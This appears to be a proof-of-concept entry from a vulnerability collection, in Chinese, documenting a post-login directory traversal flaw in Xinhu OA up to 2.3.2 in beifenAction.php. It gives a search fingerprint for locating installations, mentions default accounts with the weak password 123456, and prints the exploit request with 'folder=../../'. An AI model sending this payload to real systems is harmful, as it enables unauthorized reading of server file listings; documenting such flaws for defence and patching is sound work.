Awesome-POC/OA产品漏洞/信呼OA beifenAction.php 后台目录遍历漏洞.md

45 lines
991 B
Markdown
Raw Normal View History

2024-11-06 14:10:36 +08:00
# 信呼OA beifenAction.php 后台目录遍历漏洞
## 漏洞描述
信呼OA beifenAction.php文件中调用了 getfilerows方法导致了目录遍历漏洞攻击者通过漏洞可以获取服务器上的文件信息
## 漏洞影响
```
信呼OA <= 2.3.2
```
## 网络测绘
```
app="信呼协同办公系统"
```
## 漏洞复现
登录页面
![image-20220520133147020](images/202205201331106.png)
其中默认存在几个用户存在弱口令 123456
![image-20220520133200310](images/202205201332409.png)
存在漏洞的文件为 `webmain/system/beifen/beifenAction.php`
![image-20220520133212813](images/202205201332896.png)
查看 `getfilerows()` 方法,在 `include/chajian/fileChajian.php`
![image-20220520133224646](images/202205201332744.png)
该方法遍历目录下的文件名并输出,登录后,发送请求包
```
POST /index.php?a=getdatssss&m=beifen&d=system&ajaxbool=true
folder=../../
```
![image-20220520133237936](images/202205201332997.png)